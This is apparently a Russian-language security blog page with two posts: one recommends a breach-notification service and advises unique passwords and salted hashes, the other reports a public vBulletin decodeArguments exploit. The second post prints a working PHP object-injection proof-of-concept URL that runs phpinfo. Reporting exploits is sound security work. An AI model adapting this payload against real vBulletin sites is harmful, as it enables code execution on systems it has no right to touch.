Уведомление если ваши данные слили

Хочу порекомендовать отличный сервис. Был на него подписан с момента запуска, но проявил он себя на прошлой неделе, когда пришло уведомление, что мой e-mail и пароль были слиты в паблик.
Хорошо, что дело шло о вэб-хостинге, которым пользовался в 2006 или 2007 году — 000webhost.
Переходим по ссылке https://rbnhd.com/#check и проверяем свое мыло. Немного ниже можно подписаться на уведомления и если ваши данные утекут в паблик вам об этом сообщат.
Всегда (!) используйте разные и рандомные пароли для разных сервисов.
А программистам рекомендую: солите господа, солите. И никакого md5 😉

Эксплоит под vBulletin [decodeArguments]

В паблик запостили сплойт под vBulletin последних версий. Ниже код пруфа, который выводит phpinfo.
PoC:

1
http://localhost/vbforum/ajax/api[/]hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D

via: https://blog.sucuri.net/2015/11/vbulletin-exploits-in-the-wild.html